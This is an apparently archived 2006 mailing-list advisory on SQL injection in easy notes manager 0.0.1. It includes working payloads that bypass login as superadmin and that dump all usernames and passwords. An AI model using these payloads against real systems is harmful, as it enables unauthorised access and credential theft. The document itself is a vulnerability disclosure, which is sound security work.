easy notes manager sql injection and authentication bypass
- From: poplix@xxxxxxxxxxxx
- Date: 29 Oct 2006 04:17:11 -0000
easy notes manager (eNM) version 0.0.1, available at http://184.108.40.206/evandor/html/index.php?id=103 is affected by multiple sql injection vulnerability due to a missing check of the user supplied input.
An attacker can bypass the authentication procedure and get a full dump of the database tables.
No patches are availble but a possible solution is change the TABLEPREFIX variable in config file with a very random one and suppress all error messages (and eventually downgrade mysql5 to mysql4).
The vendor has been warned.
proof of concept to bypass authentication:
username: dontcare' and 0=1 union select id,login,'0cc175b9c0f1b6a831c399e269772661',grp,salutation,firstname,lastname,email from users where login='superadmin
proof of concept to get a list of all users and passwords:
go to search page and search for: "dontcare')) union select 0,login,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0 from users -- "
- Prev by Date: freenews---> fileinclude
- Next by Date: [MajorSecurity Advisory #29]foresite CMS - Cross Site Scripting Issue
- Previous by thread: freenews---> fileinclude
- Next by thread: [MajorSecurity Advisory #29]foresite CMS - Cross Site Scripting Issue